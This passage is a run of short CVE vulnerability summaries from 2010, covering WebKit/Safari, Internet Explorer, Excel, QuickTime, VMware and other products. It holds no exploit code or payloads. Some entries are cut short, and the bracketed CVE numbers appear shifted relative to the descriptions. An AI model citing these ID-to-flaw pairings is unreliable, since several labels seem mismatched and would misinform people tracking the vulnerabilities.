on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle changes to keyboard focus that occur during processing of key press events, which allows remote attackers to force arbitrary key presses via a crafted HTML document. [CVE-2010-1421] The execCommand JavaScript function in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict remote execution of clipboard commands, which allows remote attackers to modify the clipboard via a crafted HTML document. [CVE-2010-1419] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a certain window close action that occurs during a drag-and-drop operation. [CVE-2010-1418] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via a FRAME element with a SRC attribute composed of a javascript: sequence preceded by spaces. [CVE-2010-1417] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via HTML content that contains multiple :after pseudo-selectors. [CVE-2010-1416] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict the reading of a canvas that contains an SVG image pattern from a different web site, which allows remote attackers to read images from other sites via a crafted canvas, related to a "cross-site image capture issue." [CVE-2010-1415] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue." [CVE-2010-1414] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method. [CVE-2010-1413] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors. [CVE-2010-1412] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to hover events. [CVE-2010-1410] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements. [CVE-2010-1409] Incomplete blacklist vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to trigger disclosure of data over IRC via vectors involving an IRC service port. [CVE-2010-1408] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to bypass intended restrictions on outbound connections to "non-default TCP ports" via a crafted port number, related to an "integer truncation issue." NOTE: this may overlap CVE-2010-1099. [CVE-2010-1406] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends an https URL in the Referer header of an http request in certain circumstances involving https to http redirection, which allows remote HTTP servers to obtain potentially sensitive information via standard HTTP logging, a related issue to CVE-2010-0660. [CVE-2010-1405] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML element that has custom vertical positioning. [CVE-2010-1404] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction. [CVE-2010-1403] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to ProcessInstruction. [CVE-2010-1402] Double free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to an event listener in an SVG document, related to duplicate event listeners, a timer, and an AnimateTransform object. [CVE-2010-1401] Use-after-free vulnerability in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving the :first-letter pseudo-element. [CVE-2010-1400] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving caption elements. [CVE-2010-1399] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during a selection change on a form input element, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1398] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element. [CVE-2010-1397] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type. [CVE-2010-1396] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the contentEditable attribute and removing container elements. [CVE-2010-1395] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving DOM constructor objects, related to a "scope management issue." [CVE-2010-1394] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments. [CVE-2010-1393] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL. [CVE-2010-1392] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to HTML buttons and the first-letter CSS style. [CVE-2010-1391] Multiple directory traversal vulnerabilities in the (a) Local Storage and (b) Web SQL database implementations in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allow remote attackers to create arbitrary database files via vectors involving a (1) %2f and .. (dot dot) or (2) %5c and .. (dot dot) in a URL. [CVE-2010-1390] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to improper UTF-7 canonicalization, and lack of termination of a quoted string in an HTML document. [CVE-2010-1389] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) paste or (2) drag-and-drop operation for a selection. [CVE-2010-1387] Use-after-free vulnerability in JavaScriptCore in WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to page transitions, a different vulnerability than CVE-2010-1763 and CVE-2010-1769. [CVE-2010-1385] Use-after-free vulnerability in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document. [CVE-2010-1384] Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not provide a warning about a (1) http or (2) https URL that contains a username and password, which makes it easier for remote attackers to conduct phishing attacks via a crafted URL. [CVE-2010-1383] CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a "credential reflection" issue. [CVE-2010-1322] The merge_authdata function in kdc_authdata.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service (daemon crash), or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request that triggers an uninitialized pointer dereference, as demonstrated by a request from a Windows Active Directory client. [CVE-2010-1295] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-1285] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified manipulations involving the newclass (0x58) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-2168 and CVE-2010-2201. [CVE-2010-1262] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, related to the CStyleSheet object and a free of the root container, aka "Memory Corruption Vulnerability." [CVE-2010-1261] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1260] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-1259] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1258] Microsoft Internet Explorer 6, 7, and 8 does not properly determine the origin of script code, which allows remote attackers to execute script in an unintended domain or security zone, and obtain sensitive information, via unspecified vectors, aka "Event Handler Cross-Domain Vulnerability." [CVE-2010-1257] Cross-site scripting (XSS) vulnerability in the toStaticHTML API, as used in Microsoft Office InfoPath 2003 SP3, 2007 SP1, and 2007 SP2 [CVE-2010-1256] Unspecified vulnerability in Microsoft IIS 6.0, 7.0, and 7.5, when Extended Protection for Authentication is enabled, allows remote authenticated users to execute arbitrary code via unknown vectors related to "token checking" that trigger memory corruption, aka "IIS Authentication Memory Corruption Vulnerability." [CVE-2010-1254] The installation for Microsoft Open XML File Format Converter for Mac sets insecure ACLs for the /Applications folder, which allows local users to execute arbitrary code by replacing the executable with a Trojan Horse, aka "Mac Office Open XML Permissions Vulnerability." [CVE-2010-1253] Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2 [CVE-2010-1252] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel String Variable Vulnerability." [CVE-2010-1251] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel Record Stack Corruption Vulnerability." [CVE-2010-1250] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with malformed (1) EDG (0x88) and (2) Publisher (0x89) records, aka "Excel EDG Memory Corruption Vulnerability." [CVE-2010-1249] Buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed ExternName (0x23) record, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1247. [CVE-2010-1248] Buffer overflow in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed HFPicture (0x866) record, aka "Excel HFPicture Memory Corruption Vulnerability." [CVE-2010-1247] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record that triggers heap corruption, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1249. [CVE-2010-1246] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record, aka "Excel RTD Memory Corruption Vulnerability." [CVE-2010-1245] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed SxView (0xB0) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0824 and CVE-2010-0821. [CVE-2010-1241] Heap-based buffer overflow in the custom heap management system in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted PDF document, aka FG-VD-10-005. [CVE-2010-1240] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message. [CVE-2010-1184] The Microsoft wireless keyboard uses XOR encryption with a key derived from the MAC address, which makes it easier for remote attackers to obtain keystroke information and inject arbitrary commands via a nearby wireless device, as demonstrated by Keykeriki 2. [CVE-2010-1140] The USB service in VMware Workstation 7.0 before 7.0.1 build 227600 and VMware Player 3.0 before 3.0.1 build 227600 on Windows might allow host OS users to gain privileges by placing a Trojan horse program at an unspecified location on the host OS disk. [CVE-2010-1138] The virtual networking stack in VMware Workstation 7.0 before 7.0.1 build 227600, VMware Workstation 6.5.x before 6.5.4 build 246459 on Windows, VMware Player 3.0 before 3.0.1 build 227600, VMware Player 2.5.x before 2.5.4 build 246459 on Windows, VMware ACE 2.6 before 2.6.1 build 227600 and 2.5.x before 2.5.4 build 246459, VMware Server 2.x, and VMware Fusion 3.0 before 3.0.1 build 232708 and 2.x before 2.0.7 build 246742 allows remote attackers to obtain sensitive information from memory on the host OS by examining received network packets, related to interaction between the guest OS and the host vmware-vmx process. [CVE-2010-1131] JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the <object> substring. [CVE-2010-1127] Microsoft Internet Explorer 6 and 7 does not initialize certain data structures during execution of the createElement method, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code, as demonstrated by setting the (1) outerHTML or (2) value property of an object returned by createElement. [CVE-2010-1119] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1034] Unspecified vulnerability in HP System Management Homepage (SMH) 6.0 before 6.0.0-95 on Linux, and 6.0 before 6.0.0.96 on Windows, allows remote authenticated users to obtain sensitive information, modify data, and cause a denial of service via unknown vectors. [CVE-2010-0925] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the SRC attribute of a (1) IMG or (2) IFRAME element. [CVE-2010-0924] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.3 and 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the BACKGROUND attribute of a BODY element. [CVE-2010-0903] Unspecified vulnerability in the Net Foundation Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0900] Unspecified vulnerability in the Network Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0824] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed WOPT (0x80B) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0821 and CVE-2010-1245. [CVE-2010-0823] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0822] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted OBJ (0x5D) record, aka "Excel Object Stack Overflow Vulnerability." [CVE-2010-0821] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter. [CVE-2010-0816] Integer overflow in inetcomm.dll in Microsoft Outlook Express 5.5 SP2, 6, and 6 SP1 [CVE-2010-0815] VBE6.DLL in Microsoft Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Visual Basic for Applications (VBA), and VBA SDK 6.3 through 6.5 does not properly search for ActiveX controls that are embedded in documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "VBE6.DLL Stack Memory Corruption Vulnerability." [CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability." [CVE-2010-0807] Microsoft Internet Explorer 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, leading to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2010-0806] Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0732] gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times. [CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed. [CVE-2010-0705] Aavmker4.sys in avast! 4.8 through 4.8.1368.0 and 5.0 before 5.0.418.0 running on Windows 2000 and XP does not properly validate input to IOCTL 0xb2d60030, which allows local users to cause a denial of service (system crash) or execute arbitrary code to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption. [CVE-2010-0657] Google Chrome before 4.0.249.78 on Windows does not perform the expected encoding, escaping, and quoting for the URL in the --app argument in a desktop shortcut, which allows user-assisted remote attackers to execute arbitrary programs or obtain sensitive information by tricking a user into creating a crafted shortcut. [CVE-2010-0652] Microsoft Internet Explorer permits cross-origin loading of CSS stylesheets even when the stylesheet download has an incorrect MIME type and the stylesheet document is malformed, which allows remote HTTP servers to obtain sensitive information via a crafted document. [CVE-2010-0650] WebKit, as used in Google Chrome before 4.0.249.78 and Apple Safari, allows remote attackers to bypass intended restrictions on popup windows via crafted use of a mouse click event. [CVE-2010-0559] The default configuration of Oracle OpenSolaris snv_91 through snv_131 allows attackers to have an unspecified impact via vectors related to using kclient to join a Windows Active Directory domain. [CVE-2010-0558] The default configuration of Oracle OpenSolaris snv_77 through snv_131 allows attackers to have an unspecified impact via vectors related to using smbadm to join a Windows Active Directory domain. [CVE-2010-0555] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving the product's use of text/html as the default content type for files that are encountered after a redirection, aka the URLMON sniffing vulnerability, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0544] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to a malformed URL. [CVE-2010-0536] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted BMP image. [CVE-2010-0532] Race condition in the installation package in Apple iTunes before 9.1 on Windows allows local users to gain privileges by replacing an unspecified file with a Trojan horse. [CVE-2010-0530] Apple QuickTime before 7.6.9 on Windows sets weak permissions for the Apple Computer directory in the profile of a user account, which allows local users to obtain sensitive information by reading files in this directory. [CVE-2010-0529] Heap-based buffer overflow in QuickTime.qts in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PICT image with a BkPixPat opcode (0x12) containing crafted values that are used in a calculation for memory allocation. [CVE-2010-0528] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted color tables in a movie file, related to malformed MediaVideo data, a sample description atom (STSD), and a crafted length value. [CVE-2010-0527] Integer overflow in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. [CVE-2010-0494] Cross-domain vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 allows user-assisted remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted HTML document in a situation where the client user drags one browser window across another browser window, aka "HTML Element Cross-Domain Vulnerability." [CVE-2010-0492] Use-after-free vulnerability in mstime.dll in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via vectors related to the TIME2 behavior, the CTimeAction object, and destruction of markup, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0491] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 allows remote attackers to execute arbitrary code by changing unspecified properties of an HTML object that has an onreadystatechange event handler, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0490] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0489] Race condition in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-0488] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." [CVE-2010-0479] Buffer overflow in Microsoft Office Publisher 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability." [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers." [CVE-2010-0284] Directory traversal vulnerability in the getEntry method in the PortalModuleInstallManager component in a servlet in nps.jar in the Administration Console (aka Access Management Console) in Novell Access Manager 3.1 before 3.1.2-281 on Windows allows remote attackers to create arbitrary files with any contents, and consequently execute arbitrary code, via a .. (dot dot) in a parameter, aka ZDI-CAN-678. [CVE-2010-0267] Microsoft Internet Explorer 6, 6 SP1, and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0266] Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability." [CVE-2010-0264] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability." [CVE-2010-0263] Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0262] Microsoft Office Excel 2007 SP1 and SP2 and Office 2004 for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers access of an uninitialized stack variable, aka "Microsoft Office Excel FNGROUPNAME Record Uninitialized Memory Vulnerability." [CVE-2010-0261] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted spreadsheet in which "a MDXSET record is broken up into several records," aka "Microsoft Office Excel MDXSET Record Heap Overflow Vulnerability." [CVE-2010-0260] Heap-based buffer overflow in Microsoft Office Excel 2007 SP1 and SP2 [CVE-2010-0258] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2010-0257] Microsoft Office Excel 2002 SP3 does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Microsoft Office Excel Record Memory Corruption Vulnerability." [CVE-2010-0256] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly calculate unspecified indexes associated with Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Index Calculation Memory Corruption Vulnerability." [CVE-2010-0255] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving JavaScript exploit code that constructs a reference to a file://127.0.0.1 URL, aka the dynamic OBJECT tag vulnerability, as demonstrated by obtaining the data from an index.dat file, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0254] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 and SP2 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Visio Attribute Validation Memory Corruption Vulnerability." [CVE-2010-0248] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0247] Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0246] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and 